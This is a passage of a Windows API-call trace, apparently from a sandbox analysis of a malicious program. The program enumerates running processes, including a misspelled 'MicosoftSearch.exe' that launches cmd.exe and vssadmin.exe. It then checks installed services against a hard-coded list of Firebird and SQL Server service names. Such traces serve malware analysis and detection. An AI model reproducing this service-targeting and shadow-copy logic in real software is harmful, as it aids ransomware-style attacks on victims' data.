Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0050.665] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0050.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0050.666] lstrlenW (lpString="blue.exe") returned 8 [0050.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0050.667] lstrlenW (lpString="newly debut.exe") returned 15 [0050.667] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0050.668] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0050.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0050.668] lstrlenW (lpString="archive.exe") returned 11 [0050.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0050.669] lstrlenW (lpString="defend.exe") returned 10 [0050.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0050.670] lstrlenW (lpString="arservice.exe") returned 13 [0050.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0050.852] lstrlenW (lpString="rr-programmer.exe") returned 17 [0050.889] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0050.890] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0050.890] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0050.891] lstrlenW (lpString="twistedmonton.exe") returned 17 [0050.891] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0050.892] lstrlenW (lpString="arc plains.exe") returned 14 [0050.892] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0050.893] lstrlenW (lpString="americahousestip.exe") returned 20 [0050.893] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0050.893] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0050.893] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0050.894] lstrlenW (lpString="medical lectures.exe") returned 20 [0050.894] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0050.895] lstrlenW (lpString="electronic.exe") returned 14 [0050.895] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0050.896] lstrlenW (lpString="regression.exe") returned 14 [0050.896] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0050.896] lstrlenW (lpString="county.exe") returned 10 [0050.896] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.897] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0050.897] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0050.898] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0050.898] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0050.899] lstrlenW (lpString="cmd.exe") returned 7 [0050.899] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0050.900] lstrlenW (lpString="conhost.exe") returned 11 [0050.900] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0050.900] lstrlenW (lpString="vssadmin.exe") returned 12 [0050.900] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0050.901] lstrlenW (lpString="VSSVC.exe") returned 9 [0050.901] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.902] lstrlenW (lpString="svchost.exe") returned 11 [0050.902] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0050.903] CloseHandle (hObject=0x1f4) returned 1 [0050.903] Sleep (dwMilliseconds=0x1f4) [0051.549] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232e50 [0051.550] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0051.550] GetLastError () returned 0xea [0051.551] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0051.551] EnumServicesStatusExW (in: hSCManager=0x4232e50, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0051.551] CloseServiceHandle (hSCObject=0x4232e50) returned 1 [0051.551] lstrlenW (lpString="Appinfo") returned 7 [0051.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0051.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0051.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0051.552] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0051.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0051.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0051.552] lstrlenW (lpString="AudioSrv") returned 8 [0051.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0051.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0051.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0051.552] lstrlenW (lpString="BFE") returned 3 [0051.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0051.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0051.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0051.552] lstrlenW (lpString="CryptSvc") returned 8 [0051.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0051.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0051.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0051.552] lstrlenW (lpString="CscService") returned 10 [0051.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0051.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0051.552] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0051.552] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0051.553] lstrlenW (lpString="DcomLaunch") returned 10 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0051.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0051.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0051.553] lstrlenW (lpString="Dhcp") returned 4 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0051.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0051.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0051.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0051.553] lstrlenW (lpString="Dnscache") returned 8 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0051.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0051.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0051.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0051.553] lstrlenW (lpString="DPS") returned 3 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0051.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0051.553] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0051.553] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0051.553] lstrlenW (lpString="eventlog") returned 8 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0051.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0051.553] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0051.553] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0051.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0051.553] lstrlenW (lpString="EventSystem") returned 11 [0051.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0051.554] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0051.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0051.554] lstrlenW (lpString="gpsvc") returned 5 [0051.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0051.554] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0051.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0051.554] lstrlenW (lpString="iphlpsvc") returned 8 [0051.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0051.554] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0051.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0051.554] lstrlenW (lpString="LanmanServer") returned 12 [0051.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0051.554] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0051.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0051.554] lstrlenW (lpString="LanmanWorkstation") returned 17 [0051.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0051.554] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0051.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0051.554] lstrlenW (lpString="lmhosts") returned 7 [0051.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0051.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0051.554] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0051.555] lstrlenW (lpString="MMCSS") returned 5 [0051.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0051.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0051.555] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0051.555] lstrlenW (lpString="MpsSvc") returned 6 [0051.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0051.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0051.555] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0051.555] lstrlenW (lpString="Netman") returned 6 [0051.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0051.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0051.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0051.555] lstrlenW (lpString="netprofm") returned 8 [0051.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0051.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0051.555] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0051.555] lstrlenW (lpString="NlaSvc") returned 6 [0051.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0051.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0051.555] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0051.555] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0051.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0051.556] lstrlenW (lpString="nsi") returned 3 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0051.556] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0051.556] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0051.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0051.556] lstrlenW (lpString="PcaSvc") returned 6 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0051.556] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0051.556] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0051.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0051.556] lstrlenW (lpString="PlugPlay") returned 8 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0051.556] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0051.556] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0051.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0051.556] lstrlenW (lpString="Power") returned 5 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0051.556] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0051.556] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0051.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0051.556] lstrlenW (lpString="ProfSvc") returned 7 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0051.556] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0051.556] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0051.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0051.556] lstrlenW (lpString="RpcEptMapper") returned 12 [0051.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0051.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0051.557] lstrlenW (lpString="RpcSs") returned 5 [0051.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0051.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0051.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0051.557] lstrlenW (lpString="SamSs") returned 5 [0051.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0051.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0051.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0051.557] lstrlenW (lpString="Schedule") returned 8 [0051.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0051.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0051.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0051.557] lstrlenW (lpString="SENS") returned 4 [0051.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0051.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0051.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0051.557] lstrlenW (lpString="ShellHWDetection") returned 16 [0051.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.557] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0051.557] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0051.558] lstrlenW (lpString="Spooler") returned 7 [0051.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0051.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0051.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0051.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0051.558] lstrlenW (lpString="swprv") returned 5 [0051.558] lstrcmpiW 